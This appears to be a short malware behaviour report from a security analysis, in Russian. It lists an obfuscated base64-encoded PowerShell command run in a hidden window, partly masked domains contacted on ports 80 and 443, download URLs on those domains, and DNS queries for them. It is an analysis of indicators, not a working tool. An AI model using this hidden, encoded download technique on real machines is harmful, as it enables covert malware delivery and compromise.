Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAIAAkAEUATgB2ADoAcABVAEIAbABJAEMAWwAxADMAXQArACQARQBOAFYAOgBwAHUAQgBsAEkAYwBbADUAXQArACcAeAAnACkAKAAoACgAMwA2ACAALAAgADEAMQA5ACAALAAxADEANQAsACAAOQA5ACAALAAgADEAMQA0ACwAIAAxADAANQAsAD...
- 'ok##ot.com':80
- 'mu###iva.com':80
- 'mu###iva.com':443
- 'ne##iew.net':80
- 'st####servicios.com':80
- http://ok##ot.com/uC/
- http://mu###iva.com/mYWL/
- http://ne##iew.net/n/
- http://st####servicios.com/esDsJI/
- 'mu###iva.com':443
- DNS ASK ok##ot.com
- DNS ASK mu###iva.com
- DNS ASK ni###lmedia.com
- DNS ASK ne##iew.net
- DNS ASK st####servicios.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAIAAkAEUATgB2ADoAcABVAEIAbABJAEMAWwAxADMAXQArACQARQBOAFYAOgBwAHUAQgBsAEkAYwBbADUAXQArACcAeAAnACkAKAAoACgAMwA2ACAALAAgADEAMQA5ACAALAAxADEANQAsACAAOQA5ACAALAAgADEAMQA0ACwAIAAxADAANQAsAD...' (со скрытым окном)